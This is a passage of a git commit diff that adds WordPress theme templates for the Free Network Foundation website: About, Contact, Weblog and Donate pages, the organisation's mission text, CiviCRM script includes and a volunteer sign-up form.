big consolidation

This commit is contained in:
2022-09-27 00:51:15 -05:00
parent 4d61ad26bd
commit 50f2f1c644
509 changed files with 36567 additions and 7542 deletions

Binary file not shown.

29
fnf2014/about-fnf.php Normal file
View File

@@ -0,0 +1,29 @@
<?php
/*
* * Template Name: about-fnf
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/about" class="on">About the FNF</a>
<a href="/people">People</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

29
fnf2014/about-people.php Normal file
View File

@@ -0,0 +1,29 @@
<?php
/*
* * Template Name: about-people
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/about">About the FNF</a>
<a href="/people" class="on">People</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

72
fnf2014/about.php Normal file
View File

@@ -0,0 +1,72 @@
<?php
/*
* * Template Name: about
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="/about" class="on">About the FNF</a>
<a href="/people">People</a>
</div ##end of sidenav>
<div id="col">
<h3> Our Vision</h3>
<p>We envision a world where communities build, maintain, and own their own share of the global computer network.</p>
<h3> Our Mission</h3>
<p>The Free Network Foundation is a nonprofit organization that provides
operators around the world with essential infrastructure for the
realization and support of free networks. We engineer tools and develop
educational resources to facilitate the deployment of resilient,
responsive, and accessible networks.</p>
<h3>What We Do</h3>
<p>We envision communications infrastructure that is owned and operated
cooperatively, by the whole of humanity, rather than by corporations and
states. We are using the power of peer-to-peer technologies to create a
global network which is resistant to censorship and breakdown. We promote
freedoms, support innovations and advocate technologies that enhance and
enable digital self-determination.</p>
<p>For detailed information about our activities, finances, and ongoing projects, please
see our <a href="https://staticbits.thefnf.org/FNFAnnualReport2012.pdf">Annual Report [pdf]</a></p>
<h3>Who We Are</h3>
<ul>
<li>
We are an organization committed to the tenets of free information, free
culture, and free society.
</li>
<li>
We hold that advances in information technology
provide humanity with the ability to effectively face global challenges.
</li>
<li>
We contend that our very ability to mobilize, organize, and bring about change
depends on our ability to communicate.
</li>
<li>
We see that our ability to communicate is purchased from a handful of powerful entities.
</li>
<li>
We know that we cannot depend on these entities to support movement away from a status
quo from which they are the beneficiaries.
</li>
<li>
We believe that access to a free network is a human right, and a necessary tool for
environmental and social justice.
</li>
</ul>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

View File

@@ -0,0 +1,35 @@
<?php
/*
* * Template Name: about_hth
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="/about-vision">Vision</a>
<a href="/about-mission">Mission</a>
<a href="/about-who-we-are">Who We Are</a>
<a href="/about-what-we-do">What We do</a>
<a href="/about-how-to-help" class="on">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3>How To Help</h3>
<p> Tell your friends. There is only one true social network the human one: use
it to spread word of our work. Sign up for our e-mail list. This is our
primary mode of communication, collaboration, and exchange. Come join the
conversation. Contribute. Make a cash donation, by clicking Donate, on the
right side of the page, or contribute your time and expertise. The FNF
operates completely though crowdsourcing and volunteer labor. That means a
lot of small donations from people like you. Money goes to pay for
colocation, bandwidth and development machines.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

33
fnf2014/about_mission.php Normal file
View File

@@ -0,0 +1,33 @@
<?php
/*
* * Template Name: about_mission
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="/about-vision">Vision</a>
<a href="/about-mission" class="on">Mission</a>
<a href="/about-who-we-are">Who We Are</a>
<a href="/about-what-we-do">What We do</a>
<a href="/about-how-to-help">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3> Our Mission</h3>
<p>The Free Network Foundation is a nonprofit organization that provides
operators around the world with essential infrastructure for the
realization and support of free networks. We engineer tools and develop
educational resources to facilitate the deployment of resilient,
responsive, and accessible networks.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer();?>

View File

@@ -0,0 +1,32 @@
<?php
/*
* * Template Name: about_wwd
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="/about-vision">Vision</a>
<a href="/about-mission">Mission</a>
<a href="/about-who-we-are">Who We Are</a>
<a href="/about-what-we-do" class="on">What We do</a>
<a href="/about-how-to-help">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3>What We Do</h3>
<p>We envision communications infrastructure that is owned and operated
cooperatively, by the whole of humanity, rather than by corporations and
states. We are using the power of peer-to-peer technologies to create a
global network which is resistant to censorship and breakdown. We promote
freedoms, support innovations and advocate technologies that enhance and
enable digital self-determination.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

View File

@@ -0,0 +1,37 @@
<?php
/*
* * Template Name: about_wwa
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>About</h2>
<div id="sidenav">
<a href="/about-vision">Vision</a>
<a href="/about-mission">Mission</a>
<a href="/about-who-we-are" class="on">Who We Are</a>
<a href="/about-what-we-do">What We do</a>
<a href="/about-how-to-help">How to Help</a>
</div ##end of sidenav>
<div id="col">
<h3>Who We Are</h3>
<p>We are an organization committed to the tenets of free information, free
culture, and free society. We hold that advances in information technology
provide humanity with the ability to effectively face global challenges. We
contend that our very ability to mobilize, organize, and bring about change
depends on our ability to communicate. We see that our ability to
communicate is purchased from a handful of powerful entities. We know that
we cannot depend on these entities to support movement away from a status
quo from which they are the beneficiaries. We believe that access to a free
network is a human right, and a necessary tool for environmental and social
justice.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

65
fnf2014/category-blog.php Normal file
View File

@@ -0,0 +1,65 @@
<?php
/*
* * Template Name: weblog
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Weblog</h2>
<div id="sidenav">
<a href="https://thefnf.org/category/blog" class="on">Corporate Weblog</a>
<a href="https://thefnf.org/category/imw">Isaac's Weblog</a>
</div ##end of sidenav>
<div id="col">
<!-- Start the Loop. -->
<?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?>
<!-- Test if the current post is in category 3. -->
<!-- If it is, the div box is given the CSS class "post-cat-three". -->
<!-- Otherwise, the div box is given the CSS class "post". -->
<div class="post">
<!-- Display the Title as a link to the Post's permalink. -->
<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h2>
<!-- Display the date (November 16th, 2009 format) and a link to other posts by this posts author. -->
<small><?php the_time('F jS, Y') ?> by <?php the_author_posts_link() ?></small>
<!-- Display the Post's content in a div box. -->
<div class="entry">
<?php the_content(); ?>
</div>
<!-- Display a comma separated list of the Post's Categories. -->
<p class="postmetadata">Posted in <?php the_category(', '); ?></p>
</div> <!-- closes the first div box -->
<!-- Stop The Loop (but note the "else:" - see next line). -->
<?php endwhile; else: ?>
<!-- The very first "if" tested to see if there were any Posts to -->
<!-- display. This "else" part tells what do if there weren't any. -->
<p>Sorry, no posts matched your criteria.</p>
<!-- REALLY stop The Loop. -->
<?php endif; ?>
<div class="navigation"><p><?php posts_nav_link('&#8734;','&laquo;&laquo; Go Forward In Time','Go Back in Time &raquo;&raquo;'); ?></p></div>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

65
fnf2014/category-imw.php Normal file
View File

@@ -0,0 +1,65 @@
<?php
/*
* * Template Name: weblog
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Weblog</h2>
<div id="sidenav">
<a href="https://thefnf.org/category/blog">Corporate Weblog</a>
<a href="https://thefnf.org/category/imw" class="on">Isaac's Weblog</a>
</div ##end of sidenav>
<div id="col">
<!-- Start the Loop. -->
<?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?>
<!-- Test if the current post is in category 3. -->
<!-- If it is, the div box is given the CSS class "post-cat-three". -->
<!-- Otherwise, the div box is given the CSS class "post". -->
<div class="post">
<!-- Display the Title as a link to the Post's permalink. -->
<h2><a href="<?php the_permalink() ?>" rel="bookmark" title="Permanent Link to <?php the_title_attribute(); ?>"><?php the_title(); ?></a></h2>
<!-- Display the date (November 16th, 2009 format) and a link to other posts by this posts author. -->
<small><?php the_time('F jS, Y') ?> by <?php the_author_posts_link() ?></small>
<!-- Display the Post's content in a div box. -->
<div class="entry">
<?php the_content(); ?>
</div>
<!-- Display a comma separated list of the Post's Categories. -->
<p class="postmetadata">Posted in <?php the_category(', '); ?></p>
</div> <!-- closes the first div box -->
<!-- Stop The Loop (but note the "else:" - see next line). -->
<?php endwhile; else: ?>
<!-- The very first "if" tested to see if there were any Posts to -->
<!-- display. This "else" part tells what do if there weren't any. -->
<p>Sorry, no posts matched your criteria.</p>
<!-- REALLY stop The Loop. -->
<?php endif; ?>
<div class="navigation"><p><?php posts_nav_link('&#8734;','&laquo;&laquo; Go Forward In Time','Go Back in Time &raquo;&raquo;'); ?></p></div>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

30
fnf2014/contact-email.php Normal file
View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: contact-email
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/contact">Web Form</a>
<a href="/contact-email" class="on">E-mail</a>
<a href="/contact-irc">IRC</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

30
fnf2014/contact-irc.php Normal file
View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: contact-irc
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/contact">Web Form</a>
<a href="/contact-email">E-mail</a>
<a href="/contact-irc" class="on">IRC</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

95
fnf2014/contact-js-inc Normal file
View File

@@ -0,0 +1,95 @@
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery.min.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery-ui-1.8.16/js/jquery-ui-1.8.16.custom.min.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery-ui-1.8.16/css/smoothness/jquery-ui-1.8.16.custom.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.autocomplete.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/jquery.autocomplete.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jstree/jquery.jstree.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jstree/themes/default/style.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.menu.pack.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/menu.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.chainedSelects.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.contextMenu.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.tableHeader.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.textarearesizer.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.form.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.tokeninput.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/token-input-facebook.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.timeentry.pack.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.mousewheel.pack.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.toolTip.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/DataTables/media/js/jquery.dataTables.min.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/DataTables/media/css/demo_table_jui.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.dashboard.js"></script>
<style type="text/css">@import
url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/dashboard.css");</style>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.FormNavigate.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.validate.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.civicrm-validate.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.ui.datepicker.validation.pack.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery-fieldselection.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.jeditable.mini.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.mustache.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.blockUI.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/rest.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/Common.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmeditable.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmaccordions.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmasmselect.js"></script>
<script type="text/javascript"
src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmtooltip.js"></script>

View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: contact-newsletter
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/contact">Web Form</a>
<a href="/contact-email">E-mail</a>
<a href="/contact-irc">IRC</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<h2 id="post-<?php the_ID(); ?>"><?php the_title();?></h2>
<?php the_content(); ?>
<?php endwhile; endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

View File

@@ -0,0 +1,23 @@
<?php
/*
* * Template Name: contact-thanks
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/contact" class="on">Web Form</a>
<a href="/contact-email">E-mail</a>
<a href="/contact-irc">IRC</a>
</div ##end of sidenav>
<div id="col">
<h3> Thanks! </h3>
<p> We'll be in touch. If you'd like more information in the mean time, or if your inquiry is time-sensitive, please see the additional methods of contact listed on our <a href="https://thefnf.org/contact-email">E-mail Contact</a> page. </p>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

152
fnf2014/contact-vol.php Normal file
View File

@@ -0,0 +1,152 @@
<?php
/*
* * Template Name: contact-vol
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/contact" class="on">Web Form</a>
<a href="/contact-email">E-mail</a>
<a href="/contact-irc">IRC</a>
</div ##end of sidenav>
<div id="col">
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery.min.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery-ui-1.8.16/js/jquery-ui-1.8.16.custom.min.js"></script>
<style type="text/css">@import url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/jquery-ui-1.8.16/css/smoothness/jquery-ui-1.8.16.custom.css");</style>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.autocomplete.js"></script>
<style type="text/css">@import url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/jquery.autocomplete.css");</style>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jstree/jquery.jstree.js"></script>
<style type="text/css">@import url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jstree/themes/default/style.css");</style>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.menu.pack.js"></script>
<style type="text/css">@import url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/menu.css");</style>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.chainedSelects.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.contextMenu.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.tableHeader.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.textarearesizer.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.form.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.tokeninput.js"></script>
<style type="text/css">@import url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/token-input-facebook.css");</style>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.timeentry.pack.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.mousewheel.pack.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.toolTip.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/DataTables/media/js/jquery.dataTables.min.js"></script>
<style type="text/css">@import url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/DataTables/media/css/demo_table_jui.css");</style>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.dashboard.js"></script>
<style type="text/css">@import url("http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/css/dashboard.css");</style>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.FormNavigate.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.validate.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.civicrm-validate.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.ui.datepicker.validation.pack.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery-fieldselection.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.jeditable.mini.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.mustache.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/packages/jquery/plugins/jquery.blockUI.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/rest.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/Common.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmeditable.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmaccordions.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmasmselect.js"></script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/jquery/jquery.crmtooltip.js"></script>
<script type="text/javascript">var cj = jQuery.noConflict();</script><form action="http://thefnf.org/index.php?page=CiviCRM&amp;q=civicrm/profile/create&amp;gid=14&amp;reset=1" method="post" name="Edit" id="Edit" >
<div><input name="postURL" type="hidden" value="" />
<input name="cancelURL" type="hidden" value="http://thefnf.org/index.php?page=CiviCRM&amp;q=civicrm/profile&amp;reset=1&amp;gid=14" />
<input name="recaptcha_response_field" type="hidden" value="manual_challenge" />
<input name="_qf_default" type="hidden" value="Edit:cancel" />
</div>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm/js/Common.js"></script>
<div id="crm-container" lang="en" xml:lang="en">
<div class="form-layout-compressed"><div id="editrow-first_name" class="crm-section editrow_first_name-section form-item"><div class="label"><label for="first_name"> First Name
<span class="crm-marker" title="This field is required.">*</span>
</label></div><div class="edit-value content"><input maxlength="64" size="30" name="first_name" type="text" id="first_name" class="form-text big required" /></div><div class="clear"></div></div><div id="editrow-last_name" class="crm-section editrow_last_name-section form-item"><div class="label"><label for="last_name">Last Name</label></div><div class="edit-value content"><input maxlength="64" size="30" name="last_name" type="text" id="last_name" class="form-text big" /></div><div class="clear"></div></div><div id="editrow-email-Primary" class="crm-section editrow_email-Primary-section form-item"><div class="label"><label for="email-Primary"> Email (Primary)
<span class="crm-marker" title="This field is required.">*</span>
</label></div><div class="edit-value content"><input maxlength="64" size="30" name="email-Primary" type="text" id="email-Primary" class="form-text big required" /></div><div class="clear"></div></div><div class="crm-section helprow-custom_3-section" id="helprow-custom_3"><div class="content description">Thank you for your interest in the Free Network Foundation. In order to get you up to speed on our work, and suggest some projects that might interest you, we'd like to learn about your background. Tell us about your skills and experience, as well as where you're located. View this as the start of a conversation. We'll reach out to you, work to integrate you into our team, and connect you to nearby members of the movement. In the meantime, feel free to join us on in our chatroom (#fnm on irc.thefnf.org or commons.thefnf.org/index.php/Special:WebChat), or address any additional questions you have to contact@thefnf.org.</div></div><div id="editrow-custom_3" class="crm-section editrow_custom_3-section form-item"><div class="label"><label for="custom_3"> Volunteer Skills1
<span class="crm-marker" title="This field is required.">*</span>
</label></div><div class="edit-value content"><textarea rows="4" cols="60" name="custom_3" id="custom_3" class="form-textarea required"></textarea></div><div class="clear"></div></div><div id="editrow-custom_1" class="crm-section editrow_custom_1-section form-item"><div class="label"><label for="custom_1">Location</label></div><div class="edit-value content"><input name="custom_1" type="text" id="custom_1" class="form-text" /></div><div class="clear"></div></div></div><!-- end form-layout-compressed for last profile -->
<script type="text/javascript">
var RecaptchaOptions = {theme:'blackglass'};
</script>
<div class="crm-section recaptcha-section">
<table class="form-layout-compressed">
<tr>
<td class="recaptcha_label">&nbsp;</td>
<td><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LdbaNoSAAAAABpvCWaiqRtoT7iqR6AeXSxZwP6a "></script>
<noscript>
<iframe src="http://www.google.com/recaptcha/api/noscript?k=6LdbaNoSAAAAABpvCWaiqRtoT7iqR6AeXSxZwP6a " height="300" width="500" frameborder="0"></iframe><br/>
<textarea name="recaptcha_challenge_field" rows="3" cols="40"></textarea>
<input type="hidden" name="recaptcha_response_field" value="manual_challenge"/>
</noscript></td>
</tr>
</table>
</div>
<script type="text/javascript">cj('.recaptcha_label').attr('width', '140px');</script><div class="crm-submit-buttons">
<span class="crm-button crm-button-type-next crm-button_qf_Edit_next"><input class="form-submit default" accesskey="S" name="_qf_Edit_next" value="Save" type="submit" id="_qf_Edit_next" /></span>
<span class="crm-button crm-button-type-cancel crm-button_qf_Edit_cancel"><input class="form-submit default" name="_qf_Edit_cancel" value="Cancel" type="submit" id="_qf_Edit_cancel" /></span>
</div>
</div>
<script type="text/javascript">
</script>
<script type="text/javascript">
cj(document).ready(function(){
cj('#selector tr:even').addClass('odd-row ');
cj('#selector tr:odd ').addClass('even-row');
});
</script>
</form>
<script type="text/javascript" >
cj( function( ) {
cj("#Edit").validate({ 'errorClass': 'crm-error'});
});
</script><script type="text/javascript">jQuery.noConflict(true);</script>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: contact-volunteer
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/contact" class="on">Web Form</a>
<a href="/contact-email">E-mail</a>
<a href="/contact-irc">IRC</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<h2 id="post-<?php the_ID(); ?>"><?php the_title();?></h2>
<?php the_content(); ?>
<?php endwhile; endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

30
fnf2014/contact-web.php Normal file
View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: contact-web
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/contact" class="on">Web Form</a>
<a href="/contact-email">E-mail</a>
<a href="/contact-irc">IRC</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

30
fnf2014/contact.bak Normal file
View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: contact
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/contact" class="on">Web Form</a>
<a href="/contact-email">E-mail</a>
<a href="/contact-irc">IRC</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<h2 id="post-<?php the_ID(); ?>"><?php the_title();?></h2>
<?php the_content(); ?>
<?php endwhile; endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: donate-bitcoin
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Support</h2>
<div id="sidenav">
<a href="/donate">Join the FNF</a>
<a href="/donate-bitcoin" class="on">Give Bitcoins</a>
<a href="/donate-in-kind">Give In Kind</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

30
fnf2014/donate-inkind.php Normal file
View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: donate-inkind
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Support</h2>
<div id="sidenav">
<a href="/donate">Join the FNF</a>
